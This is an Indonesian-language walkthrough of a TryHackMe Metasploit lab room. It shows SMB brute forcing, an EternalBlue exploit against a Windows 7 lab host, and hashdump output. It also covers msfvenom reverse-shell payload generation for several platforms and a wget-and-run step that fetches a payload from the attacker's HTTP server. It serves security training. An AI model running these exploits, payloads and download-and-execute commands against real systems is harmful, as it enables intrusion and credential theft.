Writeup Aria
RoadMapCyber Security 101

Exploitation Basic Part 2

Metasploit: Exploitation

Room ini membahas penggunaan Metasploit untuk pemindaian kerentanan dan eksploitasi. Kamu akan belajar cara memindai target, mengelola hasil pengujian dengan fitur database Metasploit, melakukan vulnerability scan, serta mengeksploitasi layanan yang rentan. Selain itu, dijelaskan juga cara membuat payload menggunakan msfvenom dan mendapatkan sesi Meterpreter di berbagai platform target. Untuk serangan yang membutuhkan wordlist, digunakan file khusus di AttackBox, dan praktik dilakukan dengan menjalankan msfconsole.

wordlists yang nanti akan digunakan: /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt

Scanning

PORT SCANNING DENGAN METASPLOIT

  • Metasploit punya banyak module untuk scanning port dan service
  • Jalankan Metasploit dengan:
    msfconsole

MENCARI MODULE PORT SCAN

  • Gunakan perintah:
    search portscan
  • Contoh module:
    • auxiliary/scanner/portscan/tcp
    • auxiliary/scanner/portscan/syn
    • auxiliary/scanner/portscan/ack
    • auxiliary/scanner/portscan/xmas

MENGGUNAKAN MODULE

  • Pilih module:
    use auxiliary/scanner/portscan/tcp
  • Lihat opsi module:
    show options

OPSI PENTING PORT SCAN

  • RHOSTS Target IP atau jaringan yang akan discan
  • PORTS Rentang port (contoh: 1-10000)
  • THREADS Jumlah thread yang berjalan bersamaan
  • CONCURRENCY Jumlah port yang dicek secara paralel per host
  • TIMEOUT Batas waktu koneksi per port

CATATAN PORT SCAN

  • Metasploit scan port secara berurutan
  • Berbeda dengan Nmap yang scan 1000 port paling umum
  • Metasploit tidak secepat Nmap untuk port scanning besar

MENJALANKAN NMAP DI MSFCONSOLE

  • Bisa langsung jalankan Nmap:
    nmap -sS <IP_TARGET>
  • Lebih cepat untuk tahap information gathering

UDP SERVICE IDENTIFICATION

  • Gunakan module:
    auxiliary/scanner/discovery/udp_sweep
  • Fungsi:
    • Deteksi service UDP umum
    • Contoh: DNS, NetBIOS
  • Tidak melakukan full UDP scan

SMB SCANNING

  • Module SMB yang sering digunakan:
    • auxiliary/scanner/smb/smb_version
    • auxiliary/scanner/smb/smb_enumshares
  • Informasi yang didapat:
    • Versi OS
    • Nama host
    • Workgroup
    • Versi SMB

NETBIOS ENUMERATION

  • NetBIOS digunakan untuk komunikasi jaringan
  • Nama NetBIOS bisa menunjukkan fungsi mesin
    • Contoh: DC, DEV, SALES
  • Bisa ditemukan shared folder
  • Kadang share bisa diakses tanpa password atau password lemah

Answer Questions

msfconsole
search portscan
use auxiliary/scanner/portscan/tcp

show options
msf6 auxiliary(scanner/portscan/tcp) > nmap -sS 10.48.157.47
# PORT     STATE SERVICE
# 21/tcp   open  ftp
# 22/tcp   open  ssh
# 139/tcp  open  netbios-ssn
# 445/tcp  open  microsoft-ds
# 8000/tcp open  http-alt

set RHOSTS 10.48.157.47
run
# [+] 10.48.157.47          - 10.48.157.47:21 - TCP OPEN
# [+] 10.48.157.47          - 10.48.157.47:22 - TCP OPEN
# [+] 10.48.157.47          - 10.48.157.47:139 - TCP OPEN
# [+] 10.48.157.47          - 10.48.157.47:445 - TCP OPEN
# [+] 10.48.157.47          - 10.48.157.47:8000 - TCP OPEN

use auxiliary/scanner/discovery/udp_sweep
set RHOSTS 10.48.157.47
# *] Discovered NetBIOS on 10.48.157.47:137 (IP-10-48-157-47:<00>:U :IP-10-48-157-47:<03>:U :IP-10-48-157-47:<20>:U :__MSBROWSE__:<01>:G :ACME IT SUPPORT:<00>:G :ACME IT SUPPORT:<1d>:U :ACME IT SUPPORT:<1e>:G :00:00:00:00:00:00)

use auxiliary/scanner/smb/smb_version
setg RHOSTS 10.48.157.47
# [*] 10.48.157.47:445      - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{312d7069-2d30-3834-2d31-35372d343700}) (authentication domain:IP-10-48-157-47)
# [+] 10.48.157.47:445      -   Host is running Version 6.1.0 (unknown OS)
  • How many ports are open on the target system?
    • You can use the portscanner module on Metasploit.

5

1768315210850

use auxiliary/scanner/netbios/nbname
run
# [+] 10.48.157.47 [IP-10-48-157-47] OS:Unix Names:(IP-10-48-157-47, __MSBROWSE__, ACME IT SUPPORT) Addresses:(10.48.157.47) Mac:00:00:00:00:00:00
  • Using the relevant scanner, what NetBIOS name can you see?
    • use the netbios/nbname module.

ACME IT SUPPORT

curl http://10.48.157.47:8000
use auxiliary/scanner/http/http_version
set RPORT 8000
run
# [+] 10.48.157.47:8000 webfs/1.21 ( 403-Forbidden )
  • What is running on port 8000?
    • Use the http_version module.

webfs/1.21

use auxiliary/scanner/smb/smb_login
set SMBUser "penny"
set SMBPass file:///usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt

run
# gagal

unset SMBPass
set PASS_FILE /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
run
# [*] 10.48.157.47:445      - 10.48.157.47:445 - Starting SMB login bruteforce
# [-] 10.48.157.47:445      - 10.48.157.47:445 - Failed: '.\penny:95',
# [-] 10.48.157.47:445      - 10.48.157.47:445 - Failed: '.\penny:98',
# [-] 10.48.157.47:445      - 10.48.157.47:445 - Failed: '.\penny:2003',
# [...]
# [+] 10.48.157.47:445      - 10.48.157.47:445 - Success: '.\penny:leo1234'
  • What is the "penny" user's SMB password? Use the wordlist mentioned in the previous task.

leo1234

The Metasploit Database

1. Fungsi Metasploit Database

Metasploit menyediakan fitur database untuk membantu pengelolaan proyek penetration testing, terutama ketika menangani banyak target. Database ini menyimpan informasi seperti host, layanan, hasil scan, dan kerentanan agar tidak membingungkan saat pengujian.

Di TryHackMe AttackBox, database sudah aktif secara default. Langkah inisialisasi hanya diperlukan jika menggunakan Kali Linux atau instalasi Metasploit sendiri.

2. Inisialisasi Database Metasploit

Langkah umum yang diperlukan:

  1. Menjalankan PostgreSQL:
    systemctl start postgresql
  2. Inisialisasi database Metasploit:
    sudo -u postgres msfdb init
  3. Untuk menghapus database lama:
    sudo -u postgres msfdb delete

Setelah selesai, database siap digunakan oleh Metasploit.

3. Mengecek Status Database

Setelah masuk ke msfconsole, status database dapat dicek dengan:

db_status

Jika berhasil, akan muncul:

Connected to msf. Connection type: postgresql.

4. Workspace (Manajemen Proyek)

Workspace digunakan untuk memisahkan proyek atau target berbeda. Perintah penting:

  • Melihat workspace:
    workspace
  • Menambah workspace:
    workspace -a nama_workspace
  • Berpindah workspace:
    workspace nama_workspace
  • Menghapus workspace:
    workspace -d nama_workspace

Workspace aktif ditandai dengan simbol *.

5. Perintah Database di Metasploit

Saat database aktif, tersedia perintah tambahan seperti:

  • hosts → menampilkan daftar host
  • services → menampilkan layanan terbuka
  • vulns → daftar kerentanan
  • loot → data hasil eksploitasi
  • db_nmap → menjalankan Nmap dan otomatis menyimpan hasilnya

6. Scanning dengan db_nmap

Menggunakan db_nmap, hasil scan Nmap akan langsung tersimpan di database:

db_nmap -sV -p- <IP_TARGET>

Hasil scan bisa dilihat kembali menggunakan:

hosts
services

7. Menggunakan Data Host yang Tersimpan

IP target yang tersimpan di database dapat langsung digunakan sebagai RHOSTS:

hosts -R

Contoh penggunaan modul:

use auxiliary/scanner/smb/smb_ms17_010
hosts -R
show options
run

Jika ada banyak host, semuanya akan otomatis dimasukkan ke RHOSTS.

8. Pencarian Layanan Spesifik

Untuk mencari layanan tertentu:

services -S <nama_service>

Contoh:

services -S netbios

9. Low-Hanging Fruit (Target Mudah)

Beberapa layanan yang sering menjadi target awal:

  • HTTP → SQL Injection, RCE
  • FTP → Anonymous login
  • SMB → MS17-010
  • SSH → Password lemah
  • RDP → BlueKeep atau kredensial lemah
systemctl start postgresql
sudo -u postgres msfdb init

db_status
# [*] Connected to msfdb. Connection type: postgresql.
workspace
workspace -a tryhackme
# [*] Added workspace: tryhackme
# [*] Workspace: tryhackme

workspace default
db_nmap -sV -p- 10.48.157.47
hosts # show hosts in db

hosts -R # auto set RHOSTS for hosts in db
# address        mac  name             os_name  os_flavor  os_sp  purpose  info  comments
# -------        ---  ----             -------  ---------  -----  -------  ----  --------
# 10.10.205.0
# 10.10.224.231
# 10.48.157.47        ip-10-48-157-47  Unknown                    device

# RHOSTS => 10.10.205.0 10.10.224.231 10.48.157.47

ervices -S netbios
# host          port  proto  name         state  info
# ----          ----  -----  ----         -----  ----
# 10.48.157.47  137   udp    netbios      open   IP-10-48-157-47:<00>:U :IP-10-48-157-47:<03>:U :IP-10-48-157-47:<20>:U :__MSBROWSE__:<01>:G :ACME IT
#                                                SUPPORT:<00>:G :ACME IT SUPPORT:<1d>:U :ACME IT SUPPORT:<1e>:G :00:00:00:00:00:00
# 10.48.157.47  139   tcp    netbios-ssn  open   Samba smbd 4.6.2
# 10.48.157.47  445   tcp    netbios-ssn  open   Samba smbd 4.6.2

Vulnerability Scanning

1. Konsep Vulnerability Scanning

Metasploit memungkinkan kita dengan cepat menemukan kerentanan kritis yang sering disebut sebagai “low hanging fruit”.

Low hanging fruit adalah:

  • Kerentanan yang mudah diidentifikasi
  • Mudah dieksploitasi
  • Berpotensi memberikan akses awal (foothold) ke sistem
  • Dalam beberapa kasus dapat memberikan hak akses tinggi seperti root atau administrator

2. Pentingnya Scanning dan Fingerprinting

Keberhasilan pencarian kerentanan sangat bergantung pada:

  • Scanning (menemukan port dan service)
  • Fingerprinting (mengidentifikasi jenis layanan dan versinya)

Semakin baik hasil scanning, semakin banyak modul Metasploit yang bisa dimanfaatkan.

Contoh:

  • Jika ditemukan layanan VNC, kita bisa mencari modul terkait VNC di Metasploit.
  • Awalnya mungkin hanya tersedia payload atau post module, namun belum tentu ada exploit.
  • Untuk VNC, tersedia beberapa scanner module yang sangat berguna.

3. Contoh Modul Scanner VNC

Metasploit menyediakan beberapa modul scanner untuk VNC, seperti:

  • auxiliary/scanner/vnc/ard_root_pw
  • auxiliary/scanner/vnc/vnc_login
  • auxiliary/scanner/vnc/vnc_none_auth

Modul-modul ini digunakan untuk mengecek autentikasi VNC, bukan langsung mengeksploitasi sistem.

4. Perintah info pada Modul

Perintah info digunakan untuk:

  • Mengetahui fungsi modul
  • Melihat opsi konfigurasi
  • Memahami cara kerja modul

Contoh:

info

5. Modul vnc_login

Modul auxiliary/scanner/vnc/vnc_login berfungsi untuk:

  • Melakukan brute-force login VNC
  • Mencoba password kosong
  • Menggunakan wordlist
  • Mengambil kredensial dari database Metasploit

Fitur penting:

  • Mendukung beberapa versi protokol RFB
  • Menampilkan login yang berhasil
  • Bisa menggunakan user/password dari database
  • Bisa berhenti otomatis saat login berhasil

6. Kegunaan Modul vnc_login

Modul ini sangat berguna untuk:

  • Menemukan kredensial VNC yang lemah
  • Mengidentifikasi sistem dengan keamanan buruk
  • Mendapatkan akses awal ke target tanpa eksploit kompleks

7. Kesimpulan

Vulnerability scanning di Metasploit:

  • Fokus pada pencarian kerentanan mudah dieksploitasi
  • Sangat bergantung pada hasil enumeration
  • Menggunakan scanner modules seperti vnc_login untuk menemukan celah autentikasi
  • Merupakan langkah awal penting sebelum melakukan eksploitasi lanjutan

Answer Questions

search smtp
# auxiliary/scanner/smtp/smtp_relay
info auxiliary/scanner/smtp/smtp_relay
# Provided by:
  # Campbell Murray
  # xistence <xistence@0x90.nl>
  • Who wrote the module that allows us to check SMTP servers for open relay?
    • search -> use -> info

Campbell Murray

Exploitation

1. Metasploit sebagai Exploitation Framework

Metasploit adalah framework eksploitasi yang berfokus pada pemanfaatan kerentanan. Kategori modul exploit adalah yang paling banyak dibandingkan modul lainnya.

Komponen utama Metasploit:

  • Exploit → kode untuk memanfaatkan kerentanan
  • Payload → aksi setelah eksploit berhasil (shell, meterpreter, dll)
  • Auxiliary → scanning dan enumeration
  • Post → aktivitas pasca eksploitasi

2. Mencari dan Memilih Exploit

Beberapa perintah penting:

  • search → mencari exploit
  • info → melihat detail exploit
  • use → menggunakan exploit
  • exploit / run → menjalankan exploit

Keberhasilan eksploitasi sangat bergantung pada pemahaman service dan OS target.

3. Payload dalam Exploit

Setiap exploit biasanya memiliki payload default, namun payload lain bisa dipilih dengan:

show payloads

Payload menentukan:

  • Jenis akses (shell, meterpreter)
  • Arah koneksi (bind / reverse)
  • Arsitektur target (x86 / x64)

4. Contoh: MS17-010 (EternalBlue)

Exploit:

exploit/windows/smb/ms17_010_eternalblue

Contoh payload:

generic/shell_reverse_tcp

Payload reverse membutuhkan:

  • LHOST → IP attacker
  • LPORT → port listener

5. Konfigurasi Exploit

Langkah umum:

  1. Pilih payload:
    set payload generic/shell_reverse_tcp
  2. Atur parameter:
    set RHOSTS <IP_TARGET>
    set LHOST <IP_ATTACKER>
  3. Cek konfigurasi:
    show options
  4. Jalankan exploit:
    exploit

6. Proses Eksploitasi

Saat exploit dijalankan:

  • Metasploit mengecek kerentanan target
  • Menyesuaikan OS dan arsitektur
  • Menjalankan exploit
  • Membuka session shell jika berhasil

Jika sukses, attacker mendapatkan command shell pada sistem target.

7. Session Management

Setelah exploit berhasil, Metasploit membuat session.

Perintah penting:

  • Melihat session aktif:
    sessions
  • Background session:
    CTRL + Z
  • Interaksi dengan session:
    sessions -i <ID>
  • Menghentikan session:
    sessions -k <ID>

8. Kegunaan Background Session

Background session berguna untuk:

  • Menyerang lebih dari satu target
  • Menggunakan exploit lain pada target yang sama
  • Mengelola banyak shell sekaligus

9. Kesimpulan

Materi ini menjelaskan bahwa:

  • Metasploit sangat efektif untuk eksploitasi kerentanan
  • Pemilihan payload sangat penting dan kadang perlu trial & error
  • Reverse shell memerlukan konfigurasi LHOST
  • Session memungkinkan kontrol lanjutan terhadap target
  • Manajemen session sangat penting dalam penetration testing nyata

Answers Questions

use exploit/windows/smb/ms17_010_eternalblue

show payloads
set payload generic/shell_bind_tcp # default payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp # metrepreter payload

# set LHOST 10.48.116.168
# set RHOST 10.48.116.168

set LHOST 10.48.88.150
set RHOST 10.48.88.150

set RHOSTS 10.48.191.225

exploit
# [*] Command shell session 1 opened (10.48.116.168:34837 -> 10.48.191.225:4444) at 2026-01-13 15:24:07 +0000]
Ctrl + Z
Background session 1? [y/N]  y

sessions
Active sessions
# ===============
  # Id  Name  Type               Information                                               Connection
  # --  ----  ----               -----------                                               ----------
  # 1         shell x64/windows  Shell Banner: Microsoft Windows [Version 6.1.7601] -----  10.48.116.168:34837 -> 10.48.191.225:4444 (10.48.191.225)

sessions -h
sessions -i 1
# Microsoft Windows [Version 6.1.7601]
# C:\Windows\system32>

sessions -u 1
# [*] Upgrading session 1 to meterpreter...
search -f *flag*
# c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag1.lnk  482           2019-03-17 19:26:42 +0000
# c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag2.lnk  848           2019-03-17 19:30:04 +0000
# c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag3.lnk  2344          2019-03-17 19:32:52 +0000
# c:\Users\Jon\Documents\flag.txt                                  15            2021-07-15 03:39:25 +0100

cat c:/Users/Jon/Documents/flag.txt
# THM-5455554845
  • What is the content of the flag.txt file?
    • You can use Meterpreter's "search" command.

THM-5455554845

getuid
# Server username: NT AUTHORITY\SYSTEM

getsystem
# [-] Already running as SYSTEM

sysinfo
# Computer        : JON-PC
# OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
# Architecture    : x64
# System Language : en_US
# Domain          : WORKGROUP
# Logged On Users : 0
# Meterpreter     : x64/windows

hashdump
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# pirate:1001:aad3b435b51404eeaad3b435b51404ee:8ce9a3ebd1647fcc5e04025019f4b875:::
  • What is the NTLM hash of the password of the user "pirate"?

8ce9a3ebd1647fcc5e04025019f4b875

Msfvenom

1. Pengertian MSFvenom

MSFvenom adalah tool dalam Metasploit Framework yang menggantikan msfpayload dan msfencode. Tool ini digunakan untuk:

  • Membuat payload (reverse shell / meterpreter)
  • Mendukung berbagai sistem operasi (Windows, Linux, Android, Apple, dll)
  • Menghasilkan payload dalam berbagai format (exe, elf, php, asp, python, dll)

Untuk melihat seluruh payload yang tersedia:

msfvenom -l payloads

2. Format Output Payload

MSFvenom dapat menghasilkan:

  • Payload siap pakai (stand-alone) → misalnya file .exe, .elf
  • Payload mentah (raw) → digunakan untuk scripting (PHP, Python)

Melihat format output yang tersedia:

msfvenom --list formats

3. Encoder pada MSFvenom

Encoder digunakan untuk meng-encode payload, bukan secara langsung untuk bypass antivirus.

  • Contoh encoder: php/base64
  • Encoder kadang efektif terhadap AV lama, namun obfuscation modern lebih disarankan

Contoh membuat payload PHP Meterpreter dengan encoding Base64:

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 -f raw -e php/base64

Hasil payload akan berupa kode PHP yang diencode Base64 dan dieksekusi menggunakan eval(base64_decode()).

4. Konsep Handler (Catching a Shell)

Payload reverse shell membutuhkan listener untuk menerima koneksi dari target.

  • Listener ini disebut handler
  • Metasploit menyediakan modul exploit/multi/handler
  • Handler bisa menangani shell biasa maupun Meterpreter

5. Contoh Skenario Serangan (Upload Vulnerability)

Langkah umum eksploitasi:

  1. Generate payload menggunakan MSFvenom
  2. Menjalankan handler Metasploit
  3. Menjalankan payload di target (misalnya lewat upload file)
  4. Mendapatkan reverse shell

6. Contoh Generate PHP Reverse Shell

msfvenom -p php/reverse_php LHOST=10.0.2.19 LPORT=7777 -f raw > reverse_shell.php

⚠️ Catatan penting:

  • File PHP hasil MSFvenom tidak memiliki tag <?php dan ?>
  • Harus diedit manual agar bisa dieksekusi oleh web server

7. Menjalankan Multi/Handler

Langkah konfigurasi handler:

use exploit/multi/handler
set payload php/reverse_php
set LHOST 10.0.2.19
set LPORT 7777
run

Setelah handler berjalan, sistem akan menunggu koneksi reverse shell dari target.

Jika payload adalah Meterpreter, maka shell yang diterima juga berupa Meterpreter session.

8. Contoh Payload untuk Berbagai Platform

Linux (.elf)

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
chmod +x rev_shell.elf
./rev_shell.elf

Windows (.exe)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp

Python

msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py

9. Kesimpulan

  • MSFvenom digunakan untuk membuat payload reverse shell atau Meterpreter
  • Payload harus sesuai dengan target sistem
  • Handler (multi/handler) wajib dijalankan untuk menerima koneksi
  • Encoder hanya mengubah bentuk payload, bukan solusi utama bypass antivirus
  • Reverse payload selalu membutuhkan listener di mesin attacker

Answers Questions

msfvenom -l payloads
# aix/ppc/shell_bind_tcp                              Listen for a connection and spawn a command shell
# aix/ppc/shell_find_port                             Spawn a shell on an established  connection
# aix/ppc/shell_interact                              Simply execve /bin/sh (for inetd programs)
# aix/ppc/shell_reverse_tcp                           Connect back to attacker and spawn a command shell

msfvenom --list formats
# Framework Executable Formats [--format <value>]
# ===============================================
    # Name
    # ----
    # asp
    # aspx
    # aspx-exe
    # axis2
    # [...]
MYHOST=10.48.88.150
msfvenom -p php/meterpreter/reverse_tcp LHOST=$MYHOST -f raw -e php/base64
MYHOST=10.48.88.150
msfvenom -p php/reverse_php LHOST=$MYHOST LPORT=7777 -f raw > reverse_shell.php

1768319582470

harus di edit manual dan menghapus tag ./*php nya biar bisa di run nantinya

1768319684989 di tag terakhirnya juga ya 1768319696849

msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 10.48.88.150
set LPORT 7777
show options

run
  • Launch the VM attached to this task. The username is murphy, and the password is 1q2w3e4r. You can connect via SSH or launch this machine in the browser. Once on the terminal, type "sudo su" to get a root shell, this will make things easier.

TARGET VM LOGIN:

sudo su
# pass: 1q2w3e4r
  • Create a meterpreter payload in the .elf format (on the AttackBox, or your attacking machine of choice).

ATTACKER:

MYHOST=10.48.88.150
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$MYHOST LPORT=4444 -f elf > shell.elf

python3 -m http.server
# Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

TARGET VM:

# curl http://10.48.88.150:8000/shell.elf -o shell.elf
wget http://10.48.88.150:8000/shell.elf
chmod +x shell.elf
./shell.elf

1768320696375

  • Use a post exploitation module to dump hashes of other users on the system.
    • use the post/linux/gather/hashdump module.
sysinfo
# Computer     : ip-10-48-157-242.ap-south-1.compute.internal
# OS           : Ubuntu 20.04 (Linux 5.15.0-1081-aws)
# Architecture : x64
# BuildTuple   : i486-linux-musl
# Meterpreter  : x86/linux

getuid
# Server username: root

background
search hashdump
use post/linux/gather/hashdump

sessions
# 5         meterpreter x86/linux  root @ ip-10-48-157-242.ap-south-1.compute.internal  10.48.88.150:4444 -> 10.48.157.242:39322 (10.48.157.242)

set SESSION 5
run

atau bisa juga langsung di meterpreternya

sessions -i 5
# meterpreter >

shell
cat /etc/shadow
# murphy:$6$qK0Kt4UO$HuCrlOJGbBJb5Av9SL7rEzbxcz/KZYFkMwUqAE0ZMDpNRmOHhPHeI2JU3m9OBOS7lUKkKMADLxCBcywzIxl7b.:18851:0:99999:7:::
# claire:$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0:18851:0:99999:7:::
  • What is the other user's password hash?

$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0

On this page